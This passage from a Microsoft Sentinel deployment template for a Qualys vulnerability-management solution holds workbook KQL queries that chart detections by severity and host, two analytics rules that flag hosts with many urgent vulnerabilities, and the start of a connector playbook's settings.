== \\\"1\\\"), count() by OperatingSystem_s\\n| project-rename Total = count_\\n| sort by Total desc \\n| top 10 by Total\\n\\n\",\"size\":0,\"title\":\"Top Total Detections by Operation System\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"OperatingSystem_s\",\"label\":\"Operating System\"},{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - 
Minimal\"},{\"columnId\":\"Total\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"name\":\"query - 2 - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == \\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| summarize count() by Sev, Severity, Vulnerability ;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nlet topSerious = data\\n| where Sev == \\\"3\\\"\\n| top 10 by count_;\\nlet topMedium = data\\n| where Sev == \\\"2\\\"\\n| top 10 by count_;\\nlet topMinimal = data\\n| where Sev == \\\"1\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical, topSerious, topMedium, topMinimal\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Vulnerabilities Detected per 
Severity\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"let data = QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| extend Severity = case(Sev == \\\"5\\\", \\\"5 - Urgent\\\", Sev == 
\\\"4\\\", \\\"4 - Critical\\\", Sev == \\\"3\\\", \\\"3 - Serious\\\", Sev == \\\"2\\\", \\\"2 - Medium\\\", Sev == \\\"1\\\", \\\"1 - Minimal\\\", \\\" \\\")\\n| summarize count() by Sev, Severity, IPAddress, DnsName_s;\\nlet topUrgent = data \\n| where Sev == \\\"5\\\"\\n| top 10 by count_;\\nlet topCritical = data\\n| where Sev == \\\"4\\\"\\n| top 10 by count_;\\nlet topSerious = data\\n| where Sev == \\\"3\\\"\\n| top 10 by count_;\\nlet topMedium = data\\n| where Sev == \\\"2\\\"\\n| top 10 by count_;\\nlet topMinimal = data\\n| where Sev == \\\"1\\\"\\n| top 10 by count_;\\nunion topUrgent, topCritical, topSerious, topMedium, topMinimal\\n| project-away Sev\\n| sort by Severity, count_ desc\\n| project-rename Total = count_\\n\\n\",\"size\":0,\"title\":\"Top 10 Detections by Host per Severity\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - 
Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"Detection\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy\"},{\"type\":9,\"content\":{\"version\":\"KqlParameterItem/1.0\",\"parameters\":[{\"id\":\"d7f3f8af-5b1a-46b1-8fe6-a0440175704a\",\"version\":\"KqlParameterItem/1.0\",\"name\":\"Vuln\",\"label\":\"Vulnerability Detected\",\"type\":2,\"query\":\"QualysHostDetectionV2_CL\\r\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\r\\n| extend Sev = tostring(Severity_s)\\r\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\r\\n| extend Vuln = tostring(QID_s)\\r\\n| distinct Vuln\\r\\n\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"}],\"style\":\"formVertical\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"VulnerabilityAnalysis\"},\"name\":\"parameters - 10\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend 
Vuln = tostring(QID_s)\\n| where Vuln in (\\\"{Vuln}\\\") or '*' in (\\\"{Vuln}\\\")\\n| summarize ['5 - Urgent'] = countif(Sev == \\\"5\\\"), ['4 - Critical'] = countif(Sev == \\\"4\\\"), ['3 - Serious'] = countif(Sev == \\\"3\\\"), ['2 - Medium'] = countif(Sev == \\\"2\\\"), ['1 - Minimal'] = countif(Sev == \\\"1\\\"), count() by bin(TimeGenerated, {TimeRange:grain})\\n| project-away count_\\n\\n\",\"size\":0,\"title\":\"Detection Timeline\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"barchart\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - 
Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - Minimal\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2},\"chartSettings\":{\"seriesLabelSettings\":[{\"seriesName\":\"5 - Urgent\",\"color\":\"redBright\"},{\"seriesName\":\"4 - Critical\",\"color\":\"redDark\"},{\"seriesName\":\"3 - Serious\",\"color\":\"orange\"},{\"seriesName\":\"2 - Medium\",\"color\":\"magenta\"},{\"seriesName\":\"1 - Minimal\",\"color\":\"lightBlue\"}]}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"VulnerabilityAnalysis\"},\"name\":\"query - 2 - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Status = tostring(Status_s)\\n| extend Vulnerability = tostring(QID_s)\\n| where Vulnerability in (\\\"{Vuln}\\\") or '*' in (\\\"{Vuln}\\\") \\n| summarize count() by Status\\n\\n\",\"size\":0,\"title\":\"Detection 
Status\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"piechart\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - 
Minimal\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2},\"chartSettings\":{\"seriesLabelSettings\":[{\"seriesName\":\"5 - Urgent\",\"color\":\"redBright\"},{\"seriesName\":\"4 - Critical\",\"color\":\"redDark\"},{\"seriesName\":\"3 - Serious\",\"color\":\"orange\"},{\"seriesName\":\"2 - Medium\",\"color\":\"magenta\"},{\"seriesName\":\"1 - Minimal\",\"color\":\"lightBlue\"}]}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"VulnerabilityAnalysis\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| where Vulnerability in (\\\"{Vuln}\\\") or '*' in (\\\"{Vuln}\\\")\\n| summarize Total = count() by IPAddress, DnsName_s\\n| sort by Total desc\\n\\n\\n\\n\",\"size\":0,\"title\":\"Host(s) with Vulnerability Detected\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - 
Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"VulnerabilityAnalysis\"},\"customWidth\":\"50\",\"name\":\"query - 2 -\"}],\"fromTemplateId\":\"sentinel-QualysVMV2Workbook\",\"$schema\":\"https://github.com/Microsoft/Application-Insights-Workbooks/blob/master/schema/workbook.json\"}\r\n", + "version": "1.0", + "sourceId": "[variables('workspaceResourceId')]", + "category": "sentinel" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Workbook-', last(split(variables('workbookId1'),'/'))))]", + "properties": { + "description": "@{workbookKey=QualysVMV2Workbook; logoFileName=qualys_logo.svg; description=Gain insight into Qualys Vulnerability Management by analyzing, collecting and correlating vulnerability data.\nThis workbook provides visibility into vulnerabilities detected from vulnerability scans; dataTypesDependencies=System.Object[]; dataConnectorsDependencies=System.Object[]; previewImagesFileNames=System.Object[]; version=1.0.0; title=Qualys Vulnerability Management; 
templateRelativePath=QualysVMv2.json; subtitle=; provider=Qualys}.description", + "parentId": "[variables('workbookId1')]", + "contentId": "[variables('_workbookContentId1')]", + "kind": "Workbook", + "version": "[variables('workbookVersion1')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "operator": "AND", + "criteria": [ + { + "contentId": "QualysHostDetectionV2_CL", + "kind": "DataType" + }, + { + "contentId": "QualysVulnerabilityManagement", + "kind": "DataConnector" + } + ] + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_workbookContentId1')]", + "contentKind": "Workbook", + "displayName": "[parameters('workbook1-name')]", + "contentProductId": "[variables('_workbookcontentProductId1')]", + "id": "[variables('_workbookcontentProductId1')]", + "version": "[variables('workbookVersion1')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('analyticRuleObject1').analyticRuleTemplateSpecName1]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "HighNumberofVulnDetectedV2_AnalyticalRules Analytics Rule with template version 3.0.0", + "mainTemplate": { + "$schema": 
"https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('analyticRuleObject1').analyticRuleVersion1]", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.SecurityInsights/AlertRuleTemplates", + "name": "[variables('analyticRuleObject1')._analyticRulecontentId1]", + "apiVersion": "2023-02-01-preview", + "kind": "Scheduled", + "location": "[parameters('workspace-location')]", + "properties": { + "description": "This Creates an incident when a host has a high number of Urgent, severity 5, vulnerabilities detected.", + "displayName": "High Number of Urgent Vulnerabilities Detected", + "enabled": false, + "query": "let threshold = 10;\nQualysHostDetectionV2_CL\n| where Severity_s == \"5\"\n| summarize StartTime = min(TimeGenerated), EndTime = max(TimeGenerated), count() by NetBios_s, IPAddress\n| where count_ >= threshold\n| extend timestamp = StartTime, HostCustomEntity = NetBios_s, IPCustomEntity = IPAddress\n", + "queryFrequency": "PT1H", + "queryPeriod": "PT1H", + "severity": "Medium", + "suppressionDuration": "PT1H", + "suppressionEnabled": false, + "triggerOperator": "GreaterThan", + "triggerThreshold": 0, + "status": "Available", + "requiredDataConnectors": [ + { + "dataTypes": [ + "QualysHostDetection_CL" + ], + "connectorId": "QualysVulnerabilityManagement" + } + ], + "tactics": [ + "InitialAccess" + ], + "techniques": [ + "T1190" + ], + "entityMappings": [ + { + "fieldMappings": [ + { + "columnName": "HostCustomEntity", + "identifier": "FullName" + } + ], + "entityType": "Host" + }, + { + "fieldMappings": [ + { + "columnName": "IPCustomEntity", + "identifier": "Address" + } + ], + "entityType": "IP" + } + ] + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('AnalyticsRule-', 
last(split(variables('analyticRuleObject1').analyticRuleId1,'/'))))]", + "properties": { + "description": "QualysVM Analytics Rule 1", + "parentId": "[variables('analyticRuleObject1').analyticRuleId1]", + "contentId": "[variables('analyticRuleObject1')._analyticRulecontentId1]", + "kind": "AnalyticsRule", + "version": "[variables('analyticRuleObject1').analyticRuleVersion1]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('analyticRuleObject1')._analyticRulecontentId1]", + "contentKind": "AnalyticsRule", + "displayName": "High Number of Urgent Vulnerabilities Detected", + "contentProductId": "[variables('analyticRuleObject1')._analyticRulecontentProductId1]", + "id": "[variables('analyticRuleObject1')._analyticRulecontentProductId1]", + "version": "[variables('analyticRuleObject1').analyticRuleVersion1]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('analyticRuleObject2').analyticRuleTemplateSpecName2]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "NewHighSeverityVulnDetectedAcrossMulitpleHostsV2_AnalyticalRules Analytics Rule with template version 3.0.0", + "mainTemplate": { + 
"$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('analyticRuleObject2').analyticRuleVersion2]", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.SecurityInsights/AlertRuleTemplates", + "name": "[variables('analyticRuleObject2')._analyticRulecontentId2]", + "apiVersion": "2023-02-01-preview", + "kind": "Scheduled", + "location": "[parameters('workspace-location')]", + "properties": { + "description": "This creates an incident when a new high severity vulnerability is detected across multilple hosts", + "displayName": "New High Severity Vulnerability Detected Across Multiple Hosts", + "enabled": false, + "query": "let threshold = 10;\nQualysHostDetectionV2_CL\n| extend Status = tostring(Status_s), Vulnerability = tostring(QID_s), Severity = tostring(Severity_s)\n| where Status =~ \"New\" and Severity == \"5\"\n| summarize StartTime = min(TimeGenerated), EndTime = max(TimeGenerated), dcount(NetBios_s) by tostring(QID_s)\n| where dcount_NetBios_s >= threshold\n| extend timestamp = StartTime\n", + "queryFrequency": "PT1H", + "queryPeriod": "PT1H", + "severity": "Medium", + "suppressionDuration": "PT1H", + "suppressionEnabled": false, + "triggerOperator": "GreaterThan", + "triggerThreshold": 0, + "status": "Available", + "requiredDataConnectors": [ + { + "dataTypes": [ + "QualysHostDetection_CL" + ], + "connectorId": "QualysVulnerabilityManagement" + } + ], + "tactics": [ + "InitialAccess" + ], + "techniques": [ + "T1190" + ] + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('AnalyticsRule-', last(split(variables('analyticRuleObject2').analyticRuleId2,'/'))))]", + "properties": { + "description": "QualysVM Analytics Rule 2", + "parentId": "[variables('analyticRuleObject2').analyticRuleId2]", + "contentId": 
"[variables('analyticRuleObject2')._analyticRulecontentId2]", + "kind": "AnalyticsRule", + "version": "[variables('analyticRuleObject2').analyticRuleVersion2]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('analyticRuleObject2')._analyticRulecontentId2]", + "contentKind": "AnalyticsRule", + "displayName": "New High Severity Vulnerability Detected Across Multiple Hosts", + "contentProductId": "[variables('analyticRuleObject2')._analyticRulecontentProductId2]", + "id": "[variables('analyticRuleObject2')._analyticRulecontentProductId2]", + "version": "[variables('analyticRuleObject2').analyticRuleVersion2]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('playbookTemplateSpecName1')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysCustomConnector Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion1')]", + "parameters": { + "Connector Name": { + "defaultValue": "QualysCustomConnector", + "type": "String", + "metadata": { + 
"description": "Name of the custom Qualys Connector." + } + }, + "Service Endpoint": { + "defaultValue": "https://", + "type": "String", + "metadata": { + "description": "Enter the Qualys API Endpoint, Make sure to prefix with https:// e.g. https://qualysapi.qualys.com" + } + } + }, + "variables": { + "operationId-GetPortalDetails": "GetPortalDetails", + "_operationId-GetPortalDetails": "[[variables('operationId-GetPortalDetails')]", + "operationId-GetDetectionsByIP": "GetDetectionsByIP", + "_operationId-GetDetectionsByIP": "[[variables('operationId-GetDetectionsByIP')]", + "operationId-GetAssetDetailsByIP": "GetAssetDetailsByIP", + "_operationId-GetAssetDetailsByIP": "[[variables('operationId-GetAssetDetailsByIP')]", + "operationId-AddIPForScanning": "AddIPForScanning", + "_operationId-AddIPForScanning": "[[variables('operationId-AddIPForScanning')]", + "operationId-ReportOperations": "ReportOperations", + "_operationId-ReportOperations": "[[variables('operationId-ReportOperations')]", + "operationId-VMScanOperations": "VMScanOperations", + "_operationId-VMScanOperations": 